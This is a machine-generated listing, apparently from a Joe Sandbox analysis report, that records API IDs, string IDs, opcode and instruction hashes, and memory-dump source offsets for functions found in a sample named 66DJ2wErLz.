                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: m
                                                                                                                                                                                                                                                      • API String ID: 0-3775001192
                                                                                                                                                                                                                                                      • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                      • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: 167H
                                                                                                                                                                                                                                                      • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                      • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                      • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                      • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                      • Instruction ID: 314a0c14d75891ce2ea65c4932f600940980cf6d110c99fe7ee03d2ef38bf112
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC138B5D0021ACBCB24CF29C8526BBB7B1FF95310F19C65DD995AB790E734A841CB90
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 167H
                                                                                                                                                                                                                                                      • API String ID: 0-2704650348
                                                                                                                                                                                                                                                      • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                      • Instruction ID: f22d12ade6303ccc1003120eb5ae7a05189b76d1d6407832cbc00bde56a159d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04D15872A087494BE718CF38DC816ABB7A2DFD5314F19862CE9958B3C1D735DE058B82
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                      • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                      • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                      • API String ID: 0-2852464175
                                                                                                                                                                                                                                                      • Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                      • Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &#
                                                                                                                                                                                                                                                      • API String ID: 0-1789715784
                                                                                                                                                                                                                                                      • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                      • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &#
                                                                                                                                                                                                                                                      • API String ID: 0-1789715784
                                                                                                                                                                                                                                                      • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                      • Instruction ID: 8c4a4b032c4f459ecad28098cabdbc884449b70b9d69a8896453714440041462
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58A146B2A043145BDB189F68DC967BBB3E5EF95320F09852CE89A972C1E734ED05C352
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                      • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                      • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: -
                                                                                                                                                                                                                                                      • API String ID: 0-2547889144
                                                                                                                                                                                                                                                      • Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                      • Instruction ID: 74b7e2fa4dc2189d93563de4bab8da70db73b10b83b73ec1f6fcf640ab021818
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0D10D71A087C54BC71A8E6AC89026FBBD6EFC5710F188A2DE4E9473D5DB389D058B81
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: de
                                                                                                                                                                                                                                                      • API String ID: 0-2106599819
                                                                                                                                                                                                                                                      • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                      • Instruction ID: b7dd4ed4342c0a5946ec29905801893f3c6f4fdd3addc39aee4c77d06f4b8179
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 799133B190C3198AC324DF68C89266BB7F2EFD1324F18992CE5D68B391E7789905C752
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ~
                                                                                                                                                                                                                                                      • API String ID: 0-1707062198
                                                                                                                                                                                                                                                      • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                      • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ~
                                                                                                                                                                                                                                                      • API String ID: 0-1707062198
                                                                                                                                                                                                                                                      • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                      • Instruction ID: 27ddf09851ee24c71d07bbc2e79b0ddac06fa8532a5e78e6e92225e28c0eb771
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AA13872A082654FC725CE288C8066AB7E2AFD5324F19863DEDA99B3D1D6309D0697C1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: RpB
                                                                                                                                                                                                                                                      • API String ID: 0-664042118
                                                                                                                                                                                                                                                      • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                      • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: d1
                                                                                                                                                                                                                                                      • API String ID: 0-4211392460
                                                                                                                                                                                                                                                      • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                      • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: cdef
                                                                                                                                                                                                                                                      • API String ID: 2994545307-4216504194
                                                                                                                                                                                                                                                      • Opcode ID: d9e8f1ee42311986f1eec1db1d15d5cb27079d05f35c354e80ab23b15ff2b9d0
                                                                                                                                                                                                                                                      • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9e8f1ee42311986f1eec1db1d15d5cb27079d05f35c354e80ab23b15ff2b9d0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: cdef
                                                                                                                                                                                                                                                      • API String ID: 0-4216504194
                                                                                                                                                                                                                                                      • Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                      • Instruction ID: 5ccdf33d3f489305d69d9174d367bd82ebabe3ca8f735a34f9e77c3b80ed06ea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1815771A0C3508FCB25CF24D8909ABBBE1EFD6714F19892CE99657291D731AC81C792
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: gfff
                                                                                                                                                                                                                                                      • API String ID: 0-1553575800
                                                                                                                                                                                                                                                      • Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                      • Instruction ID: 3011abba1ed2005bdc11d4430e78ed656eb782fd98dc9c630b56fac13e3cec41
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32910271614B468FD314CF78C891BA6B7D2EB85314F18C53DD19ACB7A6EA78A842C740
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: c$
                                                                                                                                                                                                                                                      • API String ID: 0-2516980088
                                                                                                                                                                                                                                                      • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                      • Instruction ID: bc32fb957ce88c17cb60acd335e2e6def595c020738dbedc5cee8a5f96426fc6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D29188B0104741CFE7648F25C4A4B63BBB2FF46318F199688C4864FBA1E379E856CB94
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: Fg
                                                                                                                                                                                                                                                      • API String ID: 0-875302535
                                                                                                                                                                                                                                                      • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                      • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: Fg
                                                                                                                                                                                                                                                      • API String ID: 0-875302535
                                                                                                                                                                                                                                                      • Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                      • Instruction ID: 2e2795a0450ba6b4933692aa2379a8907c7e1f3a8277e3f7437bce4f6680a119
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1681D67161D3808BD768CF25D8617BBBBD3EBD2304F18896DC1D987292DB39440ACB16
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,
                                                                                                                                                                                                                                                      • API String ID: 0-3772416878
                                                                                                                                                                                                                                                      • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                      • Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,
                                                                                                                                                                                                                                                      • API String ID: 0-3772416878
                                                                                                                                                                                                                                                      • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                      • Instruction ID: 53e293897a80f9f20cc261c62b015b70fd17a21252c647530a3b9bb866fc62a2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9B1267120C3819FD325CF19C98061BBBE0AFA9744F444E2DE5D997382D631E918CBA6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
